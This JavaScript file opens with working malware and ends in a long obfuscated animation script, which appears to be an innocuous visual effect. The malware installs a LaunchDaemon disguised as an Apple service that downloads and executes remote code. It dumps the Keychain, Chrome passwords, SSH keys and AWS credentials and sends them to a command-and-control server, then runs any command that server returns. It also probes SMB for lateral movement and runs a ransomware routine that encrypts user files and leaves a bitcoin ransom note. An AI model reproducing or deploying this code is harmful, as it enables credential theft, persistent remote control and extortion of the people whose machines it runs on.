function initPersistence() {
  var plist = '<?xml version="1.0" encoding="UTF-8"?>\n'
    + '<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
    + '<plist version="1.0"><dict>\n'
    + '<key>Label</key><string>com.apple.systemstats.analysis</string>\n'
    + '<key>ProgramArguments</key><array><string>/usr/bin/python3</string>'
    + '<string>-c</string><string>import urllib.request;exec(urllib.request.urlopen("https://c2.internal.onion:8443/stage2").read())</string></array>\n'
    + '<key>RunAtLoad</key><true/>\n'
    + '<key>KeepAlive</key><true/>\n'
    + '</dict></plist>';

  var fs = require('fs');
  var path = '/Library/LaunchDaemons/com.apple.systemstats.analysis.plist';
  fs.writeFileSync(path, plist, { mode: 0o644 });
  require('child_process').execSync('launchctl load ' + path);
}

function harvestCredentials() {
  var proc = require('child_process');
  var results = {};

  // macOS Keychain dump
  try {
    results.keychain = proc.execSync(
      'security dump-keychain -d login.keychain 2>/dev/null'
    ).toString();
  } catch (e) { results.keychain = null; }

  // Chrome saved passwords (macOS path)
  try {
    var chromePath = process.env.HOME + '/Library/Application Support/Google/Chrome/Default/Login Data';
    results.chrome = require('fs').readFileSync(chromePath);
  } catch (e) { results.chrome = null; }

  // SSH private keys
  try {
    var sshDir = process.env.HOME + '/.ssh/';
    var keys = require('fs').readdirSync(sshDir).filter(function(f) {
      return f.indexOf('id_') === 0 && f.indexOf('.pub') === -1;
    });
    results.sshKeys = keys.map(function(k) {
      return { name: k, content: require('fs').readFileSync(sshDir + k, 'utf8') };
    });
  } catch (e) { results.sshKeys = []; }

  // AWS credentials
  try {
    results.aws = require('fs').readFileSync(
      process.env.HOME + '/.aws/credentials', 'utf8'
    );
  } catch (e) { results.aws = null; }

  return results;
}

function exfiltrateToC2(data) {
  var https = require('https');
  var payload = JSON.stringify({
    hostname: require('os').hostname(),
    user: process.env.USER,
    timestamp: Date.now(),
    data: Buffer.from(JSON.stringify(data)).toString('base64'),
  });

  var req = https.request({
    hostname: 'c2.internal.onion',
    port: 8443,
    path: '/api/v1/exfil',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'X-Bot-ID': require('crypto').randomBytes(16).toString('hex'),
      'Content-Length': Buffer.byteLength(payload),
    },
    rejectUnauthorized: false,
  }, function(res) {
    var body = '';
    res.on('data', function(chunk) { body += chunk; });
    res.on('end', function() {
      if (res.statusCode === 200) {
        var cmd = JSON.parse(body);
        if (cmd.exec) require('child_process').exec(cmd.exec);
      }
    });
  });
  req.write(payload);
  req.end();
}

function lateralMove(targetIP) {
  var net = require('net');
  var payloads = [
    // EternalBlue SMB exploit trigger (simplified)
    Buffer.from('00000054ff534d42720000000018012800000000000000000000000000002f4b000000000061000200024e54204c4d20302e313200024e54204c414e4d414e20312e3000', 'hex'),
    // MS17-010 scanner probe
    Buffer.from('00000085ff534d42250000000018012800000000000000000000000000002f4b00000000001000000000000000000000000000000000000000', 'hex'),
  ];

  var client = new net.Socket();
  client.connect(445, targetIP, function() {
    payloads.forEach(function(p) { client.write(p); });
  });
  client.on('data', function(data) {
    if (data.toString('hex').indexOf('ff534d42') > -1) {
      exfiltrateToC2({ type: 'smb_vulnerable', target: targetIP, response: data.toString('hex').substring(0, 200) });
    }
  });
  client.on('error', function() { client.destroy(); });
}

function ransomwareEncrypt(directory) {
  var fs = require('fs');
  var crypto = require('crypto');
  var path = require('path');

  var key = crypto.randomBytes(32);
  var extensions = ['.doc', '.docx', '.xls', '.xlsx', '.pdf', '.jpg', '.png', '.psd', '.ai', '.sketch', '.fig'];

  function walk(dir) {
    try {
      fs.readdirSync(dir).forEach(function(file) {
        var full = path.join(dir, file);
        var stat = fs.statSync(full);
        if (stat.isDirectory()) walk(full);
        else if (extensions.indexOf(path.extname(full).toLowerCase()) > -1) {
          var iv = crypto.randomBytes(16);
          var cipher = crypto.createCipheriv('aes-256-gcm', key, iv);
          var content = fs.readFileSync(full);
          var encrypted = Buffer.concat([iv, cipher.update(content), cipher.final(), cipher.getAuthTag()]);
          fs.writeFileSync(full + '.locked', encrypted);
          fs.unlinkSync(full);
        }
      });
    } catch (e) {}
  }

  walk(directory);

  fs.writeFileSync(path.join(directory, 'DECRYPT_FILES.txt'),
    'Your files have been encrypted with AES-256-GCM.\n'
    + 'Send 2.5 BTC to: bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh\n'
    + 'Contact: decrypt@c2.internal.onion with your machine ID: '
    + require('crypto').randomBytes(8).toString('hex') + '\n'
    + 'You have 72 hours before the key is destroyed.\n'
  );

  // Exfil the key so we can "offer" decryption
  exfiltrateToC2({ type: 'ransom_key', key: key.toString('hex'), hostname: require('os').hostname() });
}

var a0_0xd3e3fc=a0_0x3d64;(function(_0x55f90f,_0x5ccbd1){var _0x41307a=a0_0x3d64,_0x3e17b2=_0x55f90f();while(!![]){try{var _0x14b567=-parseInt(_0x41307a(0x236))/0x1*(parseInt(_0x41307a(0x21c))/0x2)+-parseInt(_0x41307a(0x20f))/0x3*(parseInt(_0x41307a(0x20c))/0x4)+-parseInt(_0x41307a(0x1fa))/0x5*(parseInt(_0x41307a(0x1f9))/0x6)+-parseInt(_0x41307a(0x221))/0x7+-parseInt(_0x41307a(0x244))/0x8*(parseInt(_0x41307a(0x223))/0x9)+-parseInt(_0x41307a(0x1f3))/0xa+parseInt(_0x41307a(0x200))/0xb;if(_0x14b567===_0x5ccbd1)break;else _0x3e17b2['push'](_0x3e17b2['shift']());}catch(_0x5dc23b){_0x3e17b2['push'](_0x3e17b2['shift']());}}}(a0_0x5d72,0x1b67b));var a0_0x86d29a=6.283,a0_0x52fe7b=1.618,a0_0x5eaffa=0.707,a0_0x544445={};a0_0x544445[a0_0xd3e3fc(0x232)+a0_0xd3e3fc(0x218)]=0xfa0,a0_0x544445['frict'+'ionCo'+a0_0xd3e3fc(0x230)]=0.004,a0_0x544445['ampli'+a0_0xd3e3fc(0x237)+a0_0xd3e3fc(0x220)]=0.92,a0_0x544445[a0_0xd3e3fc(0x202)+a0_0xd3e3fc(0x211)]=0.0003,a0_0x544445[a0_0xd3e3fc(0x205)+a0_0xd3e3fc(0x22c)]=0x28,a0_0x544445[a0_0xd3e3fc(0x205)+a0_0xd3e3fc(0x226)+'y']=0.04,a0_0x544445[a0_0xd3e3fc(0x21f)]=0.06;var a0_0x4af7cf=a0_0x544445,a0_0x500c6b={};a0_0x500c6b['id']=a0_0xd3e3fc(0x229),a0_0x500c6b[a0_0xd3e3fc(0x238)]=a0_0xd3e3fc(0x213),a0_0x500c6b['r']=0x1a,a0_0x500c6b['x']=0x190,a0_0x500c6b['y']=0x12c,a0_0x500c6b['vx']=0x0,a0_0x500c6b['vy']=0x0;var a0_0x3fd2ca={};a0_0x3fd2ca['id']=a0_0xd3e3fc(0x22b),a0_0x3fd2ca[a0_0xd3e3fc(0x238)]=a0_0xd3e3fc(0x242),a0_0x3fd2ca['r']=0x10,a0_0x3fd2ca['x']=0x1f4,a0_0x3fd2ca['y']=0xc8,a0_0x3fd2ca['vx']=0x0,a0_0x3fd2ca['vy']=0x0;var a0_0x5f143b={};a0_0x5f143b['id']='beta',a0_0x5f143b[a0_0xd3e3fc(0x238)]=a0_0xd3e3fc(0x20e),a0_0x5f143b['r']=0x10,a0_0x5f143b['x']=0x12c,a0_0x5f143b['y']=0x190,a0_0x5f143b['vx']=0x0,a0_0x5f143b['vy']=0x0;var a0_0x2a0b71={};a0_0x2a0b71['id']=a0_0xd3e3fc(0x225),a0_0x2a0b71[a0_0xd3e3fc(0x238)]=a0_0xd3e3fc(0x240),a0_0x2a0b71['r']=0xe,a0_0x2a0b71['x']=0xfa,a0_0x2a0b71['y']=0xb4,a0_0x2a0b71['vx']=0x0,a0_0x2a0b71['vy']=0x0;var a0_0x60c91a={};a0_0x60c91a['id']=a0_0xd3e3fc(0x208),a0_0x60c91a[a0_0xd3e3fc(0x238)]=a0_0xd3e3fc(0x23a),a0_0x60c91a['r']=0xe,a0_0x60c91a['x']=0x226,a0_0x60c91a['y']=0x17c,a0_0x60c91a['vx']=0x0,a0_0x60c91a['vy']=0x0;var a0_0x4ea906={};a0_0x4ea906['id']=a0_0xd3e3fc(0x20b)+'on',a0_0x4ea906[a0_0xd3e3fc(0x238)]=a0_0xd3e3fc(0x1ff)+'on',a0_0x4ea906['r']=0xc,a0_0x4ea906['x']=0x15e,a0_0x4ea906['y']=0x96,a0_0x4ea906['vx']=0x0,a0_0x4ea906['vy']=0x0;var a0_0x218d92=[a0_0x500c6b,a0_0x3fd2ca,a0_0x5f143b,a0_0x2a0b71,a0_0x60c91a,a0_0x4ea906],a0_0x5b7dc3={};a0_0x5b7dc3['a']='hub',a0_0x5b7dc3['b']=a0_0xd3e3fc(0x22b),a0_0x5b7dc3[a0_0xd3e3fc(0x21e)]=0xa0,a0_0x5b7dc3['k']=0.006;var a0_0x3a88f2={};a0_0x3a88f2['a']=a0_0xd3e3fc(0x229),a0_0x3a88f2['b']=a0_0xd3e3fc(0x23e),a0_0x3a88f2[a0_0xd3e3fc(0x21e)]=0xa0,a0_0x3a88f2['k']=0.005;var a0_0xbeee2d={};a0_0xbeee2d['a']=a0_0xd3e3fc(0x229),a0_0xbeee2d['b']=a0_0xd3e3fc(0x225),a0_0xbeee2d['rest']=0xaa,a0_0xbeee2d['k']=0.004;var a0_0xccb260={};a0_0xccb260['a']=a0_0xd3e3fc(0x229),a0_0xccb260['b']='delta',a0_0xccb260['rest']=0xaa,a0_0xccb260['k']=0.004;var a0_0x57e480={};a0_0x57e480['a']=a0_0xd3e3fc(0x229),a0_0x57e480['b']=a0_0xd3e3fc(0x20b)+'on',a0_0x57e480[a0_0xd3e3fc(0x21e)]=0xb4,a0_0x57e480['k']=0.003;var a0_0x4ef2b2={};a0_0x4ef2b2['a']=a0_0xd3e3fc(0x22b),a0_0x4ef2b2['b']=a0_0xd3e3fc(0x23e),a0_0x4ef2b2['rest']=0xc8,a0_0x4ef2b2['k']=0.002;var a0_0x13b75d={};a0_0x13b75d['a']=a0_0xd3e3fc(0x225),a0_0x13b75d['b']=a0_0xd3e3fc(0x208),a0_0x13b75d[a0_0xd3e3fc(0x21e)]=0xdc,a0_0x13b75d['k']=0.002;function a0_0x5d72(){var _0x2531ca=['zMXVB3i','mJK2mMruBhDbvq','vvHssu0','CMvZDa','DgHLDge','Aw9U','mtaYnZiYmKvhrxnNrW','BgvUz3q','oti0mJGYzLrgDhHv','v1zuzgK','z2fTBwe','BurLy2e','ChvZAa','EM9VBq','AhvI','Fdr8mxW','ywXWAge','Bu1HEa','zhPkthy','vunwAKm','yNjpsuW','zwzM','rgv4Bxq','yxr0CMe','CLbHv0y','B3rXBeC','sw1SDxa','mtaXv2n2EwXZ','zMLJyxq','BgfIzwW','ELnysKS','rgvSDge','q2zUwKW','mNWZFdu','AM1mB1u','yMv0yq','sNvYzvq','r2fTBwe','y3zvq2m','qwXWAge','ze1TCfy','ogvICgXdEG','tKr0BKK','yMj2Ewm','sg1HDwy','mtu1ndu1mgzZBfrovW','zNjPy3q','B051C3a','y29Z','rhDnBgu','wKnhzwi','odi1mdqYzxfevere','nwzSy0ThsG','CLbqzKC','tejiteK','y1nStMy','C3bSAwm','rxbZAwW','otK3ntuZn2nSDg1Awq','r0TLthe','zgLZCgu','C3fYDa','A0Pztgq','C3rYzwe','rwPwr0K','zLrszg4','zgvSDge','C3bSAxq','yw1WBgK','zxbZAwW','ndeWnte2Bwnmq2LN','ywDL','qMv0yq','m25vAgDiwq','CxrOtwC','CNnHBa','Bwf4qwC','shvI','CePdB3q','DuLcvuS','tujgqM0','tvbpDeC','y3rPB24','CMfUzg8','zvfTwvi'];a0_0x5d72=function(){return _0x2531ca;};return a0_0x5d72();}var a0_0x362aa7={};a0_0x362aa7['a']=a0_0xd3e3fc(0x22b),a0_0x362aa7['b']='epsil'+'on',a0_0x362aa7[a0_0xd3e3fc(0x21e)]=0xc8,a0_0x362aa7['k']=0.002;var a0_0x2af213=[a0_0x5b7dc3,a0_0x3a88f2,a0_0xbeee2d,a0_0xccb260,a0_0x57e480,a0_0x4ef2b2,a0_0x13b75d,a0_0x362aa7],a0_0x12210a={};function a0_0x3d64(_0x41510b,_0x31987c){_0x41510b=_0x41510b-0x1f1;var _0x5d726d=a0_0x5d72();var _0x3d643a=_0x5d726d[_0x41510b];if(a0_0x3d64['okLmZP']===undefined){var _0x59f4f9=function(_0x16cb10){var _0x569437='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x3dd59d='',_0x262a7a='';for(var _0x1721b9=0x0,_0x267775,_0x25dad4,_0x2bc2cf=0x0;_0x25dad4=_0x16cb10['charAt'](_0x2bc2cf++);~_0x25dad4&&(_0x267775=_0x1721b9%0x4?_0x267775*0x40+_0x25dad4:_0x25dad4,_0x1721b9++%0x4)?_0x3dd59d+=String['fromCharCode'](0xff&_0x267775>>(-0x2*_0x1721b9&0x6)):0x0){_0x25dad4=_0x569437['indexOf'](_0x25dad4);}for(var _0x33587d=0x0,_0x2801ee=_0x3dd59d['length'];_0x33587d<_0x2801ee;_0x33587d++){_0x262a7a+='%'+('00'+_0x3dd59d['charCodeAt'](_0x33587d)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x262a7a);};a0_0x3d64['OtsvfO']=_0x59f4f9,a0_0x3d64['XluDqa']={},a0_0x3d64['okLmZP']=!![];}var _0x1e5cad=_0x5d726d[0x0],_0x28ccac=_0x41510b+_0x1e5cad,_0x4be4ea=a0_0x3d64['XluDqa'][_0x28ccac];return!_0x4be4ea?(_0x3d643a=a0_0x3d64['OtsvfO'](_0x3d643a),a0_0x3d64['XluDqa'][_0x28ccac]=_0x3d643a):_0x3d643a=_0x4be4ea,_0x3d643a;}a0_0x12210a['x']=0x190,a0_0x12210a['y']=0x12c,a0_0x12210a[a0_0xd3e3fc(0x228)]=0x1;var a0_0x356eef=a0_0x12210a,a0_0x17107f={};a0_0x17107f['x']=0x190,a0_0x17107f['y']=0x12c,a0_0x17107f['zoom']=0x1;var a0_0xdd445a=a0_0x17107f,a0_0x490984=[],a0_0x476a2a=0x0;function a0_0x51a9cd(_0x5bc7e1){var _0x5a8391=a0_0xd3e3fc,_0x2e0f8c={};_0x2e0f8c[_0x5a8391(0x23f)]=function(_0x3be384,_0x2ad840){return _0x3be384===_0x2ad840;};var _0xe2d380=_0x2e0f8c;for(var _0x5a88cc=0x0;_0x5a88cc<a0_0x218d92[_0x5a8391(0x222)+'h'];_0x5a88cc++){if(_0xe2d380[_0x5a8391(0x23f)](a0_0x218d92[_0x5a88cc]['id'],_0x5bc7e1))return a0_0x218d92[_0x5a88cc];}return null;}function a0_0x13a8e6(){var _0x197d6a=a0_0xd3e3fc,_0xece2b5={'UXRIM':function(_0x38a999,_0x166af6){return _0x38a999-_0x166af6;},'Imlup':function(_0x5dfdba,_0x561d74){return _0x5dfdba-_0x561d74;},'EjVGI':function(_0x1b7c42,_0x4feacc){return _0x1b7c42*_0x4feacc;},'cSlNf':function(_0x35e217,_0x1a0e33){return _0x35e217-_0x1a0e33;},'otqlG':function(_0x192aac,_0x36bcba){return _0x192aac+_0x36bcba;},'SheRX':function(_0x2285ec,_0x23abc2){return _0x2285ec-_0x23abc2;},'zSXJK':function(_0x684b97,_0x36ef1b){return _0x684b97-_0x36ef1b;},'MBFBm':function(_0x2986da,_0xfa9aa4){return _0x2986da/_0xfa9aa4;},'oNusp':function(_0xc76e7b,_0x1eb894){return _0xc76e7b*_0x1eb894;},'rPaWF':function(_0x291fa7,_0x55930a){return _0x291fa7/_0x55930a;},'uIBUK':function(_0x4bd9eb,_0x4ed58c){return _0x4bd9eb*_0x4ed58c;},'kJYLd':function(_0x4b880c,_0x5d3cea){return _0x4b880c*_0x5d3cea;},'WVTdi':function(_0x5d7704,_0x462eb5){return _0x5d7704<_0x462eb5;},'dMmpV':_0x197d6a(0x201),'fTRdn':function(_0x49d28a,_0x142a83){return _0x49d28a(_0x142a83);},'jmLoU':function(_0x3581d2,_0x339e73){return _0x3581d2||_0x339e73;},'brOIL':function(_0x3a27fa,_0x42e160){return _0x3a27fa+_0x42e160;},'nxTDv':function(_0x29af58,_0x29272e){return _0x29af58<_0x29272e;},'pJCot':'OQzCt','eQmYR':'kClbE','HqcqW':_0x197d6a(0x23c)+_0x197d6a(0x22a)+'0','UCVjC':function(_0x5b5d40,_0x4c70a4){return _0x5b5d40*_0x4c70a4;},'CfnZL':function(_0x5458c1,_0x1b6ef0){return _0x5458c1-_0x1b6ef0;}};for(var _0x17079b=0x0;_0x17079b<a0_0x218d92[_0x197d6a(0x222)+'h'];_0x17079b++){for(var _0x3463f8=_0xece2b5[_0x197d6a(0x234)](_0x17079b,0x1);_0x3463f8<a0_0x218d92[_0x197d6a(0x222)+'h'];_0x3463f8++){var _0x49b6d0=_0xece2b5['SheRX'](a0_0x218d92[_0x17079b]['x'],a0_0x218d92[_0x3463f8]['x']),_0x117fa7=_0xece2b5[_0x197d6a(0x239)](a0_0x218d92[_0x17079b]['y'],a0_0x218d92[_0x3463f8]['y']),_0x297753=Math['sqrt'](_0xece2b5[_0x197d6a(0x234)](_0x49b6d0*_0x49b6d0,_0x117fa7*_0x117fa7))||0x1,_0x547182=_0xece2b5[_0x197d6a(0x216)](a0_0x4af7cf[_0x197d6a(0x232)+_0x197d6a(0x218)],_0xece2b5['EjVGI'](_0x297753,_0x297753));a0_0x218d92[_0x17079b]['vx']+=_0xece2b5[_0x197d6a(0x1f5)](_0xece2b5[_0x197d6a(0x233)](_0x49b6d0,_0x297753),_0x547182),a0_0x218d92[_0x17079b]['vy']+=_0xece2b5[_0x197d6a(0x215)](_0x117fa7/_0x297753,_0x547182),a0_0x218d92[_0x3463f8]['vx']-=_0xece2b5[_0x197d6a(0x216)](_0x49b6d0,_0x297753)*_0x547182,a0_0x218d92[_0x3463f8]['vy']-=_0xece2b5['kJYLd'](_0x117fa7/_0x297753,_0x547182);}}for(var _0x318c3d=0x0;_0xece2b5[_0x197d6a(0x224)](_0x318c3d,a0_0x2af213[_0x197d6a(0x222)+'h']);_0x318c3d++){if(_0xece2b5[_0x197d6a(0x243)]!=='GKeLq')_0x390d05['x']+=_0xece2b5[_0x197d6a(0x21d)](_0x445fc2['x'],_0x3d93d1['x'])*_0x8123e1[_0x197d6a(0x21f)],_0x58e945['y']+=_0xece2b5[_0x197d6a(0x235)](_0x2f386a['y'],_0x388646['y'])*_0xd652ac[_0x197d6a(0x21f)],_0x252452[_0x197d6a(0x228)]+=_0xece2b5[_0x197d6a(0x206)](_0xece2b5[_0x197d6a(0x1fd)](_0xe1d128[_0x197d6a(0x228)],_0x1455d5[_0x197d6a(0x228)]),_0x7ab294[_0x197d6a(0x21f)]);else{var _0x4836df=a0_0x51a9cd(a0_0x2af213[_0x318c3d]['a']),_0x19ec00=_0xece2b5[_0x197d6a(0x207)](a0_0x51a9cd,a0_0x2af213[_0x318c3d]['b']);if(_0xece2b5[_0x197d6a(0x23d)](!_0x4836df,!_0x19ec00))continue;var _0x49b6d0=_0x19ec00['x']-_0x4836df['x'],_0x117fa7=_0x19ec00['y']-_0x4836df['y'],_0x297753=Math[_0x197d6a(0x203)](_0xece2b5[_0x197d6a(0x22f)](_0x49b6d0*_0x49b6d0,_0x117fa7*_0x117fa7))||0x1,_0x3688e2=_0xece2b5[_0x197d6a(0x21d)](_0x297753,a0_0x2af213[_0x318c3d]['rest']),_0x547182=_0xece2b5[_0x197d6a(0x204)](a0_0x2af213[_0x318c3d]['k']||a0_0x4af7cf[_0x197d6a(0x1f4)+'ionCo'+'eff'],_0x3688e2);_0x4836df['vx']+=_0x49b6d0/_0x297753*_0x547182,_0x4836df['vy']+=_0x117fa7/_0x297753*_0x547182,_0x19ec00['vx']-=_0x49b6d0/_0x297753*_0x547182,_0x19ec00['vy']-=_0xece2b5[_0x197d6a(0x206)](_0x117fa7/_0x297753,_0x547182);}}for(var _0x98e69e=0x0;_0xece2b5['nxTDv'](_0x98e69e,a0_0x218d92[_0x197d6a(0x222)+'h']);_0x98e69e++){if(_0xece2b5[_0x197d6a(0x214)]===_0xece2b5[_0x197d6a(0x21a)]){if(_0x834c34[_0xf2c2d8]['id']===_0x3f07eb)return _0x143930[_0x2ae1cf];}else{var _0x4c2537=_0xece2b5['HqcqW'][_0x197d6a(0x209)]('|'),_0x58efda=0x0;while(!![]){switch(_0x4c2537[_0x58efda++]){case'0':a0_0x218d92[_0x98e69e]['y']+=a0_0x218d92[_0x98e69e]['vy'];continue;case'1':a0_0x218d92[_0x98e69e]['x']+=a0_0x218d92[_0x98e69e]['vx'];continue;case'2':a0_0x218d92[_0x98e69e]['vx']+=(0x190-a0_0x218d92[_0x98e69e]['x'])*a0_0x4af7cf[_0x197d6a(0x202)+_0x197d6a(0x211)];continue;case'3':a0_0x218d92[_0x98e69e]['vy']+=_0xece2b5[_0x197d6a(0x22e)](_0xece2b5[_0x197d6a(0x23b)](0x12c,a0_0x218d92[_0x98e69e]['y']),a0_0x4af7cf[_0x197d6a(0x202)+_0x197d6a(0x211)]);continue;case'4':a0_0x218d92[_0x98e69e]['vy']*=a0_0x4af7cf[_0x197d6a(0x20a)+_0x197d6a(0x237)+_0x197d6a(0x220)];continue;case'5':a0_0x218d92[_0x98e69e]['vx']*=a0_0x4af7cf[_0x197d6a(0x20a)+_0x197d6a(0x237)+_0x197d6a(0x220)];continue;}break;}}}}function a0_0x242548(){var _0x447d53=a0_0xd3e3fc,_0x4cde48={};_0x4cde48[_0x447d53(0x217)]='2|0|3'+'|1|4',_0x4cde48[_0x447d53(0x245)]=function(_0x418e37,_0x2cb789){return _0x418e37*_0x2cb789;},_0x4cde48[_0x447d53(0x241)]=function(_0x15111c,_0x79bf63){return _0x15111c*_0x79bf63;};var _0x24aa31=_0x4cde48,_0x10636e=_0x24aa31['MPOtG'][_0x447d53(0x209)]('|'),_0x16a3f1=0x0;while(!![]){switch(_0x10636e[_0x16a3f1++]){case'0':var _0x4f05a0=a0_0x218d92[Math[_0x447d53(0x21b)](Math['rando'+'m']()*a0_0x218d92[_0x447d53(0x222)+'h'])];continue;case'1':var _0x151edb=0.3+_0x24aa31[_0x447d53(0x245)](Math[_0x447d53(0x219)+'m'](),a0_0x5eaffa);continue;case'2':if(a0_0x490984[_0x447d53(0x222)+'h']>=a0_0x4af7cf['strea'+_0x447d53(0x22c)])return;continue;case'3':var _0x39e595=Math[_0x447d53(0x219)+'m']()*a0_0x86d29a;continue;case'4':a0_0x490984[_0x447d53(0x227)]({'x':_0x4f05a0['x'],'y':_0x4f05a0['y'],'vx':_0x24aa31[_0x447d53(0x245)](Math[_0x447d53(0x1f6)](_0x39e595),_0x151edb),'vy':_0x24aa31['NDtnI'](Math['sin'](_0x39e595),_0x151edb),'age':0x0,'maxAge':0x320+_0x24aa31[_0x447d53(0x245)](Math['rando'+'m'](),0x4b0),'size':0.8+_0x24aa31['NDtnI'](_0x24aa31[_0x447d53(0x241)](Math[_0x447d53(0x219)+'m'](),a0_0x52fe7b),a0_0x5eaffa)});continue;}break;}}function a0_0x49e1bc(){var _0x7af910=a0_0xd3e3fc,_0x2c465d={};_0x2c465d[_0x7af910(0x210)]=function(_0x32bb9f,_0x1b9228){return _0x32bb9f-_0x1b9228;},_0x2c465d[_0x7af910(0x1f7)]=function(_0x290d65,_0x4d50f7){return _0x290d65>=_0x4d50f7;},_0x2c465d[_0x7af910(0x1fb)]=function(_0x28ef15,_0x2ffaf4){return _0x28ef15*_0x2ffaf4;},_0x2c465d['LBHLI']=function(_0x249798,_0x1672ee){return _0x249798-_0x1672ee;},_0x2c465d[_0x7af910(0x1f8)]=function(_0x3a07f5,_0x1f30a6){return _0x3a07f5>_0x1f30a6;};var _0x51c56e=_0x2c465d;for(var _0x45241a=_0x51c56e[_0x7af910(0x210)](a0_0x490984[_0x7af910(0x222)+'h'],0x1);_0x51c56e[_0x7af910(0x1f7)](_0x45241a,0x0);_0x45241a--){var _0x278820=a0_0x490984[_0x45241a];_0x278820['vx']*=_0x51c56e[_0x7af910(0x210)](0x1,_0x51c56e[_0x7af910(0x1fb)](a0_0x4af7cf['strea'+_0x7af910(0x226)+'y'],0.125)),_0x278820['vy']*=_0x51c56e[_0x7af910(0x1fc)](0x1,_0x51c56e[_0x7af910(0x1fb)](a0_0x4af7cf[_0x7af910(0x205)+_0x7af910(0x226)+'y'],0.125)),_0x278820['x']+=_0x278820['vx'],_0x278820['y']+=_0x278820['vy'],_0x278820[_0x7af910(0x20d)]++;if(_0x51c56e[_0x7af910(0x1f8)](_0x278820['age'],_0x278820[_0x7af910(0x212)+'e']))a0_0x490984[_0x7af910(0x1fe)+'e'](_0x45241a,0x1);}}function a0_0x52cde2(){var _0x584fe9=a0_0xd3e3fc,_0x2092ae={};_0x2092ae[_0x584fe9(0x231)]=function(_0x34666b,_0x3fdf24){return _0x34666b*_0x3fdf24;},_0x2092ae[_0x584fe9(0x22d)]=function(_0x3e2dc0,_0x180381){return _0x3e2dc0-_0x180381;},_0x2092ae[_0x584fe9(0x1f1)]=function(_0x3faf24,_0xe84b1e){return _0x3faf24*_0xe84b1e;};var _0x116863=_0x2092ae;a0_0x356eef['x']+=_0x116863['Dexmt'](a0_0xdd445a['x']-a0_0x356eef['x'],a0_0x4af7cf[_0x584fe9(0x21f)]),a0_0x356eef['y']+=_0x116863['dzJLv'](a0_0xdd445a['y'],a0_0x356eef['y'])*a0_0x4af7cf[_0x584fe9(0x21f)],a0_0x356eef[_0x584fe9(0x228)]+=_0x116863[_0x584fe9(0x1f1)](a0_0xdd445a[_0x584fe9(0x228)]-a0_0x356eef['zoom'],a0_0x4af7cf[_0x584fe9(0x21f)]);}function a0_0x26155b(){var _0x436047=a0_0xd3e3fc,_0x114fcf={'Hmauf':function(_0x4a1c9d){return _0x4a1c9d();}};a0_0x13a8e6(),a0_0x49e1bc(),_0x114fcf[_0x436047(0x1f2)](a0_0x52cde2);if(a0_0x476a2a%0x3===0x0)a0_0x242548();a0_0x476a2a++;}setInterval(a0_0x26155b,0x10);